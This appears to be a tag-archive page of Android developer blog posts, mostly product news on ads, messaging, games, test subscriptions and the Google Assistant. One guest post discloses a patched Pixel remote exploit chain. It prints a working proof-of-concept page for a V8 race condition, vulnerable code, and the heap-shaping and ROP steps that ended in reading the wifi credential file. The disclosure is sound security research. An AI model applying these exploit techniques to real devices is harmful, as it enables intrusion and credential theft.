Tag Archives: Android

Use ad content filtering to help improve your users’ ad experience

Cross posted from the AdMob blog.

Optimizing the ad experience in your app for a varied audience can be difficult. Showing users ads that are a better fit can improve their overall ad experience and help maximize your app’s revenue.

AdMob has launched a new feature that allows you to specify the content rating for Google ads served in your app. With the new max_ad_content_rating signal, you can now choose the content rating of Google demand that you want to deliver on a per-request basis.

Four content rating choices offer you the granularity you need to provide users at each level with a better user experience. The four new content rating choices are:

  • G: Content suitable for general audiences
  • PG: Content suitable for most audiences with parental guidance
  • T: Content suitable for teen and older audiences
  • MA: Content suitable only for mature audiences

You can start sending the new max_ad_content_rating signal in the Google Mobile Ads SDK by following these Android and iOS guides. To learn more about the new signal and the content rating choices, visit the AdMob help center or contact your Google account team.
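
For Android, the guide describes passing the signal as an AdMob network extra on each ad request. The snippet below is a minimal sketch of that pattern, assuming the Google Mobile Ads SDK and its AdMob mediation adapter are available; the "G" value and the wrapper class are illustrative placeholders, not part of the original post.

import android.os.Bundle;

import com.google.ads.mediation.admob.AdMobAdapter;
import com.google.android.gms.ads.AdRequest;

public class ContentRatingRequests {
    // Builds an ad request that limits Google demand to content rated "G".
    // "max_ad_content_rating" is the signal described above; accepted values
    // are "G", "PG", "T", and "MA". Class and method names here are
    // illustrative placeholders.
    public static AdRequest buildGRatedRequest() {
        Bundle extras = new Bundle();
        extras.putString("max_ad_content_rating", "G");

        return new AdRequest.Builder()
                .addNetworkExtrasBundle(AdMobAdapter.class, extras)
                .build();
    }
}

Because the signal is attached per request, you can vary the rating ceiling by screen or audience segment rather than setting a single app-wide value.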

Posted by Alexa Haushalter, Product Manager, AdMob

Huawei to integrate Android Messages across their Android smartphone portfolio

Over the coming months, Huawei will make it even easier for hundreds of millions of people to express themselves via mobile messaging by integrating Android Messages, powered by RCS, across their Android smartphone portfolio.

With Android Messages and RCS messaging, Huawei devices will now offer a richer native messaging and communications experience. Features such as texting over Wi-Fi, rich media sharing, group chats, and typing indicators will now be a default part of the device. Messages from businesses will also be upgraded on Huawei’s devices through RCS business messaging. And Huawei users will be able to make video calls directly from Android Messages through carrier ViLTE and Google Duo.

In addition, to help carriers accelerate deployment of RCS messaging across their networks, we’re collaborating with Huawei to offer the Jibe RCS cloud and hub solution to current and prospective carrier partners, as part of an integrated solution with Huawei's current infrastructure. This will enable a faster process for RCS services so more subscribers can get access to RCS messaging.

Huawei will begin integrating Android Messages across their portfolio in the coming months. For more information, see the following release.

Android Security Ecosystem Investments Pay Dividends for Pixel

Posted by the Android Security Team

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, the highest reward in the history of the ASR program, plus $7,500 from the Chrome Rewards program, for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with a security patch level of 2017-12-05 or later are protected from these issues.

All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.

The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in the Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.

The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.

This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in Chrome's sandboxed render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.0.3112.107 + Android 7.1.2 (security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism for sharing memory between JavaScript workers and synchronizing control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers: a low-level, assembly-like language with a compact binary format that runs with near-native performance and provides languages such as C/C++ with a compilation target so that they can run on the web. By combining the three features (SharedArrayBuffer, WebAssembly, and web workers) in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.

The buggy code is in the function GetFirstArgumentAsBytes, where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer was introduced to JavaScript, a TypedArray may be backed by a SharedArrayBuffer, so the contents of the TypedArray may be modified by other worker threads at any time.

i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}

A simple PoC is as follows:

<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })

var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);

//worker.terminate(); 
</script>
</html>

The text format of the WebAssembly code is as follows:

00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end

First, the binary WebAssembly code above is put into a SharedArrayBuffer, and a TypedArray object is created using that SharedArrayBuffer as its buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly code, the worker thread modifies the SharedArrayBuffer at the same time. Under these circumstances, the race condition causes a TOCTOU issue: after the main thread's bounds check, the instruction "call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.

Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.

 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))

Not only can the instruction "call 0" be modified; any "call funcx" instruction can be modified. Assume funcx is a wasm function with six arguments, as follows. When v8 compiles funcx for the ia32 architecture, the first five arguments are passed through registers and the sixth argument is passed through the stack. All of the arguments can be set to arbitrary values from JavaScript:

/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)

/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop

Safepoints (size = 8)

RelocInfo (size = 0)

--- End code ---

When a JavaScript function calls a WebAssembly function, the v8 compiler internally creates a JS_TO_WASM function; after compilation, the JavaScript function calls the created JS_TO_WASM function, which in turn calls the WebAssembly function. JS_TO_WASM functions use a different calling convention: their first argument is passed through the stack. Suppose "call funcx" is modified to call the following JS_TO_WASM function.

/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>

The JS_TO_WASM function will take the sixth argument of funcx as its first argument, but it treats its first argument as an object pointer, so type confusion is triggered when that argument is passed to the ToNumber function. In other words, we can pass any value as an object pointer to ToNumber. So we can fake an ArrayBuffer object at some address, such as inside a double array, and pass that address to ToNumber. The layout of an ArrayBuffer is as follows:

/* ArrayBuffer layout, 40 bytes */
Map
Properties
Elements
ByteLength
BackingStore
AllocationBase
AllocationLength
Fields
internal
internal


/* Map layout, 44 bytes */
static kMapOffset = 0,
static kInstanceSizesOffset = 4,
static kInstanceAttributesOffset = 8,
static kBitField3Offset = 12,
static kPrototypeOffset = 16,
static kConstructorOrBackPointerOffset = 20,
static kTransitionsOrPrototypeInfoOffset = 24,
static kDescriptorsOffset = 28,
static kLayoutDescriptorOffset = 1,
static kCodeCacheOffset = 32,
static kDependentCodeOffset = 36,
static kWeakCellCacheOffset = 40,
static kPointerFieldsBeginOffset = 16,
static kPointerFieldsEndOffset = 44,
static kInstanceSizeOffset = 4,
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,
static kUnusedOffset = 6,
static kVisitorIdOffset = 7,
static kInstanceTypeOffset = 8,     //one byte
static kBitFieldOffset = 9,
static kInstanceTypeAndBitFieldOffset = 8,
static kBitField2Offset = 10,
static kUnusedPropertyFieldsOffset = 11

Because the content of the stack can be leaked, we can get a lot of useful data for faking the ArrayBuffer. For example, we can leak the start address of an object and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's Properties and Elements fields.

We also have to fake the Map of the ArrayBuffer. Luckily, most of the Map's fields are not used when the bug is triggered, but the InstanceType at offset 8 has to be set to 0xc3 (this value depends on the version of v8) to indicate that the object is an ArrayBuffer. In order to get a reference to the faked ArrayBuffer in JavaScript, we set the Prototype field of the Map at offset 16 to an object whose Symbol.toPrimitive property is a JavaScript callback function. When the faked ArrayBuffer is passed to the ToNumber function, the callback is invoked to convert the object to a Number, and inside that callback we obtain a reference to the faked ArrayBuffer.

Because the ArrayBuffer is faked inside a double array, the content of the array can be set to any value, so we can change the BackingStore and ByteLength fields of the faked ArrayBuffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple: since JIT code in Chrome is readable, writable, and executable, we can overwrite it to execute shellcode.

The Chrome team fixed this bug very quickly in Chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by a mismatch between map and unmap, which leads to a use-after-unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:

static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}

gralloc_map maps a graphic buffer, controlled by the handle argument, into memory, and gralloc_unmap unmaps it. While mapping, mappedAddress plus hnd->offset is stored in hnd->base, but while unmapping, hnd->base is passed directly to the unmap call without subtracting hnd->offset. Since hnd->offset can be manipulated from Chrome's sandboxed render process, it's possible to unmap arbitrary pages in system_server from that process.

static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}

int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}

Although SELinux restricts the isolated_app domain from accessing most Android system services, isolated_app can still access three Android system services:

neverallow isolated_app {
    service_manager_type
    -activity_service
    -display_service
    -webviewupdate_service
}:service_manager find;

To trigger the aforementioned use-after-unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parcelable, into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.

This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except that exploiting it from a sandboxed Chrome render process is more difficult than from an app.

To exploit this EoP bug:

1. Address space shaping. Shape the address space so that it looks as follows, with a heap chunk right above several contiguous ashmem mappings:

7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f54800000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......

2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:

7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

3. Fill the unmapped space with an ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)

4. Spray the heap and the heap data will be written to the ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager still believes it owns the memory range from 0x7f547ff000 to 0x7f54800000 and will allocate memory from this range, so heap data gets written to the ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

5. Because the ashmem filled in step 3 is mapped by both system_server and the render process, part of system_server's heap can be read and written by the render process, and we can trigger system_server to allocate some GraphicBuffer objects in the ashmem. As GraphicBuffer inherits from ANativeWindowBuffer, which has a member named common of type android_native_base_t, we can read two function pointers (incRef and decRef) from the ashmem memory and then calculate the base address of the libui module. On the latest Pixel device, Chrome's render process is still a 32-bit process but system_server is a 64-bit process, so we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger the ROP chain. Unluckily, the incRef and decRef pointers don't seem to be used, so it's impossible to modify them to jump to the ROP chain, but we can modify the virtual table of GraphicBuffer to trigger it instead.

typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;

    /* the sizeof() of the actual EGL native type */
    int version;

    void* reserved[4];

    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;

6. Trigger a GC to execute the ROP chain

When a GraphicBuffer object is destructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to the ROP chain; when a GC happens, control flow goes to the ROP chain. Finding a ROP chain within a single limited module (libui) is challenging, but after hard work we successfully found one and dumped the contents of the file /data/misc/wifi/wpa_supplicant.conf.

Summary

The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google devices and devices with a security patch level of 2017-12-05 or later are protected against these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate similar vulnerabilities.

The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Many thanks to both teams for their work.

Meet the finalists of the Google Play Indie Games Contest in Europe

Posted by Adriana Puchianu, Developer Marketing Google Play

Back in October we launched the 2nd edition of the Google Play Indie Games Contest in Europe, with the aim of identifying, showcasing and rewarding indie gaming talent from more than 30 countries. We were amazed by the innovation and creativity that indie developers from the region have to offer.

Selecting just 20 finalists has once again been a huge challenge. We had a lot of fun playing the games that will be showcased at the Saatchi Gallery on February 13th in London. Without further ado, we are happy to announce the top 20 finalists of this year's edition. Congratulations to the finalists, and thanks to everyone else who entered the contest.

A Planet of Mine
Tuesday Quest
France

Bridge Constructor Portal
ClockStone Softwareentwicklung GmbH
Austria

Bury me, my Love
Playdius
France

Captain Tom Galactic Traveler
Picodongames
France

Core
FURYJAM
Russia

Flat Pack
Nitrome
United Kingdom

Fern Flower
Macaque
Poland

I Love Hue
Zut!
United Kingdom

Jodeo
Gamebra.in
Turkey

Kami 2
State of Play
United Kingdom

Kenshō
FIFTYTWO
Russia

No More Buttons
Tommy Søreide Kjær
Norway

Old Man's Journey
Broken Rules Interactive Media GmbH
Austria

The Big Journey
Catfishbox
Ukraine

The House of Da Vinci
Blue Brain Games, s.r.o.
Slovakia

The Office Quest
11Sheep
Israel

Unbalance
TVEE
Turkey

Undervault
Andriy Bychkovskyi
Ukraine

yellow
Bart Bonte
Belgium

Check out the prizes

All 20 finalists are getting:

  • A paid trip to London to showcase their game at the Final held at Saatchi Gallery
  • Inclusion of their game on a promotional billboard in London for 1 month
  • Inclusion of their game in a dedicated Indie Games Contest collection on the Indie Corner for one month in more than 40 countries across EMEA
  • Two (2) tickets to attend a 2018 Playtime event, an invitation-only event for top apps and games developers on Google Play
  • One (1) Pixel 2 device

They will also have the chance to win more prizes at the final event.

Join the Google Play team and the finalists at the final event:

Anyone can now register to attend the final showcase event for free at the Saatchi Gallery in London on 13 February 2018. Come and play some great games and have fun with indie developers, industry experts, and the Google Play team.

Faster Renewals for Test Subscriptions

Testing your in-app subscriptions is a critical step in ensuring you're offering your customers a high quality service.

In order to make testing easier and faster, starting on February 20th we are introducing shorter renewal intervals for test purchases made with license-test accounts. Currently, subscriptions purchased by license-test accounts renew daily. The new intervals will allow you to test an entire subscription cycle, including 6 renewals, in under an hour. We will also be shortening the time intervals of features such as grace period and account hold.

We are announcing these changes in advance so you can update your testing flows before they take effect. Also note that existing test subscriptions still active on February 20, 2018 will automatically be canceled at that time.

Renewal times

Renewal times will vary based on the subscription period:

Subscription period    Test subscription period
1 week                 5 minutes
1 month                5 minutes
3 months               10 minutes
6 months               15 minutes
1 year                 30 minutes

Time intervals of the following features will also be shortened for test subscriptions:

Feature                            Test period
Free trial                         3 minutes
Introductory price period          Same as test subscription period
Grace period (both 3 and 7 day)    5 minutes
Account hold                       10 minutes

Note: These times are approximate; you may see some small variation in the precise time of an event. To compensate for this variation, call the Google Play Developer API to view a subscription's current status after each expiration date.
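
As a sketch of that check, the server-side Google Play Developer API (the androidpublisher client library) can be queried for a purchase token's current state. The package name, product ID, purchase token, and service-account key path below are placeholder assumptions, and the exact builder classes may vary with the client-library version you use.

import java.io.FileInputStream;
import java.util.Collections;

import com.google.api.client.googleapis.auth.oauth2.GoogleCredential;
import com.google.api.client.googleapis.javanet.GoogleNetHttpTransport;
import com.google.api.client.json.jackson2.JacksonFactory;
import com.google.api.services.androidpublisher.AndroidPublisher;
import com.google.api.services.androidpublisher.AndroidPublisherScopes;
import com.google.api.services.androidpublisher.model.SubscriptionPurchase;

public class SubscriptionStatusCheck {
    // Queries the current state of a test subscription after its (shortened)
    // expiration time. The package name, product ID, purchase token, and
    // service account key path are placeholders.
    public static void main(String[] args) throws Exception {
        GoogleCredential credential = GoogleCredential
                .fromStream(new FileInputStream("service-account.json"))
                .createScoped(Collections.singleton(AndroidPublisherScopes.ANDROIDPUBLISHER));

        AndroidPublisher publisher = new AndroidPublisher.Builder(
                GoogleNetHttpTransport.newTrustedTransport(),
                JacksonFactory.getDefaultInstance(),
                credential)
                .setApplicationName("subscription-status-check")
                .build();

        SubscriptionPurchase purchase = publisher.purchases().subscriptions()
                .get("com.example.app", "example_subscription_id", "purchase-token-from-client")
                .execute();

        System.out.println("expiryTimeMillis = " + purchase.getExpiryTimeMillis());
        System.out.println("autoRenewing     = " + purchase.getAutoRenewing());
    }
}

Comparing expiryTimeMillis with the current time after each shortened renewal window is usually enough to confirm that renewals, grace period, and account hold behave the way you expect.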

Renewal limit

Due to the increased renewal frequency, the number of renewals is limited to 6 regular renewals (not including the intro price or free trial period). After 6 renewals, the subscription is automatically canceled.

Examples

Here are several examples of how the new renewal times are applied: free trial, grace period, and account hold.

Don't forget to check the Testing In-app Billing page for more details on testing your subscriptions. If you still have questions, reach out through the comments or post your question on Stack Overflow using the tag google-play.

Android Excellence: congratulations to the newly added apps and games

Posted by Kacey Fahey, Developer Marketing, Google Play

Kicking off the new year, we're excited to welcome our latest group of Android Excellence apps and games. These awardees represent some of the best experiences and top performing apps and games on the Play Store and can be found with other great selections on the Editors' Choice page.

If you're looking for some new apps, below are a few highlights.

  • EyeEm: A great photo editor app with a full suite of filters and tools to make your pictures shine. Learn style tips from their community and even sell your images through the EyeEm marketplace.
  • Musixmatch: Check out Musixmatch's updated app while learning the lyrics to all your favorite songs. The app is compatible with many of the top music streaming services and you can even follow along with your Android Wear device or on the big screen with Chromecast support.
  • ViewRanger: Plan your next hiking adventure by discovering new routes and trail guides with ViewRanger. Check out the Skyline feature using your phone's camera to identify over 9 million sites across the world through augmented reality.

Here are a few of our favorite new games joining the collection.

  • Fire Emblem Heroes: Nintendo's popular strategy-RPG franchise is now reimagined for mobile. Fight battles, develop your heroes' skills, and try various gameplay modes for hours of exciting gameplay.
  • Lumino City: Explore the charming papercraft style world in this award-winning puzzle adventure game. The beautiful scenery is all handcrafted.
  • Old Man's Journey: Gorgeous scenery, an immersive soundtrack, and deep emotion help you uncover the old man's life stories while you solve puzzles and shape the landscape to determine his future.

Congratulations to the newly added Android Excellence apps and games.

New Android Excellence apps:

  • 1tap
  • Acorns
  • Airbnb
  • Blink Health
  • Blinkist
  • Clue
  • Ditty
  • EyeEm
  • Fabulous
  • IFTTT
  • iReader
  • Journey
  • KKBOX
  • LinkedIn
  • Mobills: Budget Planner
  • Musixmatch
  • Shpock
  • Stocard
  • Video Editor
  • ViewRanger
  • YAZIO
  • YOP

New Android Excellence games:

  • Agent A
  • Bit Heroes
  • Bloons Supermonkey 2
  • Dancing Line
  • DEAD WARFARE: Zombie
  • Dragon Project
  • Fire Emblem Heroes
  • Futurama: Worlds of Tomorrow
  • Idle Heroes
  • Last Day on Earth: Survival
  • Lords Mobile
  • Lumino City
  • Modern Combat Versus
  • Old Man's Journey
  • The Walking Dead No Man's Land
  • War Wings

Explore other great apps and games in the Editors' Choice section on Google Play and discover best practices to help you build quality apps and games for people to love.

New devices and more: what’s in store for the Google Assistant this year

The Google Assistant is your personal Google. It lets you have a conversation and ask about everything under the sun and, best of all, it’s available wherever you need help—at home or on the go. Over the past year, we've been working to bring the Assistant to more devices in more places and now it's available on more than 400 million devices.

Tuesday marks the start of the Consumer Electronics Show in Las Vegas, NV, and we'll be there to showcase some of the exciting stuff we have in store for 2018. So if you’re at CES, stop on by the Google Assistant Playground (Central Plaza-21). Here we go!

At home

The Google Assistant gives you an easy, hands-free way to control your home, whether it’s helping you dim the lights from the comfort of your couch or play your dinner party playlist. It's already lending a helping hand in speakers like Google Home, Mini and Max. In fact, we’ve sold more than one Google Home every second since Google Home Mini started shipping in October. And with so much excitement around speakers, we’re making the Assistant even more available—this week we’re announcing that the Assistant is coming to new voice-activated speakers from Altec Lansing, Anker Innovations, Bang & Olufsen, Braven, iHome, JBL, Jensen, LG, Klipsch, Knit Audio, Memorex, RIVA Audio and SōLIS.

But there are also moments when a screen would make the Assistant even more helpful, like when you need to learn how to cut a pineapple, and the best way is to watch a video. Today, we're announcing that the Assistant is coming to smart displays. These new devices have the Google Assistant built in, and with the added benefit of a touch screen, they can help you get even more done. You can watch videos from YouTube, video call with Google Duo, find photos from Google Photos and more. You can also get recommendations for your favorite content, right on the home screen.

Starting later this year, the Assistant is coming to new smart displays from four companies, including JBL, Lenovo, LG and Sony. To learn more about how smart displays were built, visit the Android Developers blog.

Assistant on smart display

Last year we brought the Assistant to Android TV devices including NVIDIA's SHIELD TV and Sony’s Android TVs, so you can find the latest blockbuster, stock up on snacks with Google Express and set the perfect movie watching mood lighting. We will continue to roll out the Assistant to existing Android TVs such as AirTV Player, Bouygues Telecom, LG U+, TCL, Skyworth and Xiaomi. And, this week, Changhong, Element, Funai, Haier, Hisense and Westinghouse are announcing new Android TVs with the Google Assistant. Plus, we've worked closely with LG to integrate the Assistant into the new line of LG TVs in the coming months.

And, across all your devices, the Google Assistant is making your home even smarter. The Assistant now works with over 225 home control brands and more than 1,500 devices, including a bunch of new ones from Abode, Crestron, Gourmia, Insteon, Kohler and Yonomi. With these integrations, millions of new smart home devices are being connected to the Assistant every month, so you can stay in control, whether you want to heat up the house, check on the laundry or make sure you locked the back door.

On your phone and headphones

The Google Assistant is available on your Android phone, iPhone, and headphones, helping you when you're on the go. And this week we're announcing that over the coming year, more headphones are on the way from Jaybird, JBL, LG and Sony. These headphones are optimized for the Google Assistant; once you pair them to your phone, you can talk to the Assistant instantly with just the touch of an earbud, whether you want to skip a track to hear the next song, get notifications, or hear and respond to your messages.

In your car

The Assistant can also help you in the car, so that you can keep your hands on the wheel and eyes on the road. Starting this week in the U.S., the Assistant is coming to Android Auto.

